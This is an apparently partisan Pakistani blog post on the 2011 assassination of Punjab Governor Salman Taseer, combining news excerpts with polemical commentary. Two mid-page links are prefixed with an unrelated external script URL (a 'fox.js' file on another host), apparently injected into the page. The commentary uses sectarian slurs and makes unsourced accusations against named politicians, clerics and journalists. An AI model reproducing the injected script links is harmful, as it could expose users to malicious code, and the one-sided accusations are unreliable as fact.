A brainwashed fanatic kills Governor Punjab Salman Taseer

An extremist and religious fanatic (reportedly of the Barelvi sect) killed Governor Punjab Salman Taseer in a brazen attack in Islamabad today.

Governor Punjab had received death threats from the following because of his bold stance on the blasphemy law:

1. Sipah-e-Sahaba

2. Taliban

3. Jamaat-e-Islami

4. PML-N (Rana Sanaullah and Shahbaz Sharif in particular)

5. Other sectarian and religio-political organizations including extremist Barelvis of the Dawat-e-Islami, Sunni Tehreek and the Tehreek-e-Namoos-e-Risalat

May his soul rest in peace. This post will be updated shortly.

Just like the murder of Murtaza Bhutto by the same establishment was a message to the late Benazir in 1996 that the PPP Government’s days were numbered, this may be a similar message to President Zardari that the current PPP government’s days are also numbered.

The outspoken governor of Pakistan’s most politically important province Punjab was shot dead in the capital Islamabad on Tuesday, state television reported.

After the gruesome attacks on Ahmadis, Sunnis and Shias in Pakistan, the late Governor Taseer had stood out in his bold stance against the military establishment sponsored jihadis like Sipah Sahaba (renamed now as Ahle Sunnah wal Jammah).  For many months in the last year, efforts were made to align Governor Taseer with the Pro-Taliban views of the Chief Minister Punjab, Shahbaaz Sharif and his Law Minister, Rana Sanullah.

After having failed at this, the establishment was also furious at Governor Taseer’s support of the poor Christain woman, Asiya Bibi.  The late governor had appeared in a press conference in support of this victimized Pakistani Christain woman who was being targetted by the usual array of Islamofascists on trumped up blasphemy charges.

The Blasphemy Law is a relic of another military dictator, Zia ul Haq, under whose regime the current Chief Minister Of Punjab’s career was developed. It is natural that Shahbaz Sharif and his PML N will support this law that has no basis in Islam but is a great weapon for the Islamofascists.  After a lower court convicted Asiya bibi and the so-called Independant Judiciary made a preemptive stay against the President’s power to pardon this women, it was only a matter of time before the bold Governor Taseer would have to pay for taking a stand against Jihadis.

It cost him his life.

In a post that we continue to update, it would be remiss to ignore the fundemental reason for this horrifying murder.  While the Jihadi who killed Governor Taseer was an ordinary foot soldier, it is really our warped middle class bourgeoisie and its continued denial of the threat of Islamofascism.  It is our so-called educated middle class that continues to apologize for these Jihadi monsters or worse, obfuscate their crimes with a litany of politically correct literature past its sell by date mixed in with the usual dose of conspiracy theories.

As the cold winter night descends on another martyred opponent of Islamofascism, how much longer will our civil society continue its sickening defense of not just the Jihadis but their protectors in the judiciary and the media.

As Kristalnacht is slowly descending on Pakistan’s religious and sectarian minorities, how many more sacrifices by PPP leaders and ANP representatives will it take to convince our chattering classes that we are in a war where the enemy is clearly defined.  We don’t need anymore vague talk and meaningless generalities  of “making a more tolerant Pakistan”.  Like the late Governor Taseer, we all need to take a stand against the Islamofascists, PERIOD.  Crying crocodile tears like our civil society did when BB was killed is only going to make matters worse.

Wake up Pakistan!

Report Continued

Police said earlier Taseer had been shot and wounded near his Islamabad home in the leafy F6 sector and close to Kohsar market, a popular shopping and cafe spot frequented by wealthy Pakistanis and expatriates.

Police official Mohammad Iftikhar says Salman Taseer was gunned down by one of his elite security force protectors. As per emerging reports, the security force protectors had been supplied by the Punjab government of Shahbaz Sharif. The assassin, namely Malik Mumtaz Qadri, is reported to originate from Rawalpindi, the GHQ city of Pakistan.

Five other people were wounded as other security personnel responded to the attack Tuesday in Islamabad.

Malik Mumtaz maloon, the assassin, brainwashed by Hameed Gul, Mehr Bokhari, and religious mullahs

Brainwashed: Extremist Deobandi mullah offers a reward for anyone who kills Aasia Bibi: Nawaiwaqt joins the jihad.

Here is a most illegal, most violent and most un-Islamic statement by an extremist Deobandi mullah (‘Maulana’ Yousuf Qureshi) of a major mosque in Peshawar. This mullah is notorious for his pro-Taliban and pro-Imran Khan views, is a senior member of the Jamaat-e-(Ghair)Islami, and is also known to have direct links with a local commander of Pakistan Army. This hateful creature is one of the most ‘learned’ students of Mufti Taqi Usmani of Karachi, the spiritual leader of Afghani and Pakistani Taliban. http://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&lubpak.com/archives/31674

Evidence of Deobandi-Wahhabi connection: http://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&tribune.com.pk/story/267875/deobandis-wahhabis-to-join-qadri-protests/

A witness at the scene said Taseer was stepping out of his car at a shopping area when he was shot. “The governor fell down and the man who fired at him threw down his gun and raised both hands,” said the witness, Ali Imran. The shooting left blood stains on a parking area on the edge of the Kohsar shopping centre, which is popular among foreigners in Islamabad.

According to latest reports, Malik Mumtaz maloon (cursed), though of Barelvi sect, was an avid reader of hateful and sectarian literature produced by the Sipah-e-Sahaba and the Sunni Tehreek. Several sectarian books and pamphlets have been recovered from his house.

Related articles:

Extremist Barelvis vomit hate and violence

On PML-N’s opportunistic politics on Aasia bibi

PML-N’s Sipah-e-Sahaba group and its cost to Punjab

Aasia must die: Rana Sanaullah’s open letter to the people of Pakistan

Rana Sanaullah has ties with sectarian terrorists? Shame on you, PML-N

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Police unable to arrest or interrogate the two mullahs who encouraged Mumtaz Qadri to kill Governor Taseer


Of course, the fake civil society (FCS) will never write against their heroes, the Islamofascist judges, who are granting bail to terrorists and their abettors nor against the GHQ’s Jihad Enterprise which is single major source of the jihadi and sectarian terrorism in Pakistan. In the following news report, Amir Mir reveals how the Punjab Police (under the able leadership of Rana Sanaullah of the Sipah-e-Sahaba alliance fame) and the toothless Joint Investigation Team (constrained by the ISI and MI) are unable to arrest or interrogate the instigators of maloon Mumtaz Qadri who brainwashed him to kill Governor Punjab Salmaan Taseer. These are the topics on which Declan Walshes, Mosharraf Zaidis, Cyril Almeidas and Tammy Haqs ‘of’ Pakistan will never write, and we know why.

Agencies probing Taseer murder in a fix

Monday, January 24, 2011

By Amir Mir

LAHORE: Police as well as the Joint Investigation Team set up by the federal government to investigate January 4 assassination of governor Salman Taseer are in a sticky situation how to quiz the two clerics who had allegedly instigated the self-confessed assassin to commit the murder.

The Rawalpindi trial court has already granted them pre-arrest bails besides rejecting the investigators’ plea for their custody. Mumtaz Qadri had admitted in his confessional statement that he was actually provoked for the murder by the fiery speeches of two Rawalpindi-based clerics Mufti Hanif Qureshi Qadri and Imtiaz Hussain Shah.

According to Qadri’s confessional statement, Mufti Hanif Qureshi, the ameer of a Rawalpindi-based religious outfit, Shabab-e-Islami Pakistan and Imtiaz Hussain Shah, the imam of a Rawalpindi-based Amna Masjid, had described Salmaan Taseer a “Yazeedi governor” in their December 31, 2010 speeches at a public meeting in Rawalpindi organised by the Shabab-e-Islami .

The clerics were trying to convince the listeners, while citing certain verses of the Holy Quraan that Taseer was worth killing (Wajibul Qatal) for having committed blasphemy by labeling the blasphemy law a black law. During their speeches, the clerics narrated an event of blasphemy committed by a woman during the rule of Hazrat Abu Bakar Siddiq, the first Caliph of Islam, saying, “The governor of the area where the woman lived awarded punishment to her over the act of blasphemy. As she approached the Caliph, seeking mercy, the latter decided against her and ordered that her teeth to be broken and fingers and tongue be cut for having committed blasphemy”.

As the Rawalpindi-based investigators were flexing their muscles to detain the two clerics for interrogation, Hanif Qureshi and Imtiaz Shah launched a preemptive offensive to counter any move against them.

While resorting to street agitation, the two clerics staged a demonstration in Rawalpindi on January 7, to ‘pay homage’ to the assassin of Taseer. The rally culminated at the Muslim Town residence of Malik Mumtaz Qadri. The participants of the rally were chanting slogans and carrying banners and placards, inscribing pro-Qadri slogans and describing him a “Ghazi”.

Condemning the government for Qadri’s arrest, Hanif Qureshi, who also leads Friday prayers at the Jamia Rizvia Zial Uloom in Rawalpindi, praised the killer for having killed a ‘blasphemer’. He further said: “Ghazi Malik Mumtaz Qadri did this for the love of our beloved Prophet Mohammad (Peace Be upon Him).

The man who called the Blasphemy Law a black law was bound to meet this end and he should not be called a martyr but a blasphemer. And Mumtaz Qadri should not be called a killer but a “Ghazi” (one who leaves the battle victorious).” Keeping in view the street power shown by Hanif Qureshi and Mumtaz Shah, the investigating agencies became defensive and decided to seek court orders for the arrest of the two clerics instead of detaining them on their own. The investigators were of the view that the arrest of the two fanatic mullahs without seeking court orders could trigger nationwide protests by their followers.

However, on January 17, 2011, an Anti Terrorism Court (ATC) in Rawalpindi refused to issue warrants for the arrest of the two clerics for the purpose of interrogation about their speeches during which they had reportedly justified killing of any blasphemer. Having heard arguments from both the sides, ATC Judge Malik Akram Awan, refused to issue the warrants on grounds of incomplete evidence. Two days later, on January 20, the ATC judge granted pre-arrest bails to Hanif Qureshi and Imtiaz Shah against surety bonds worth Rs200, 000 each. The counsel for the clerics argued before the ATC judge that his clients were not at all involved in motivating Qadri and the FIR also did not mention their names.

Under these circumstances, the Rawalpindi police as well as the Joint Investigation Team are simply unable to question the suspects who have refused to cooperate in investigations of the case. The authorities will have to wait for the expiry of their pre-arrest bails before proceedings against them any further. Source: The News

Mumtaz Qadri being brainwashed in a carefully orchestrated environment




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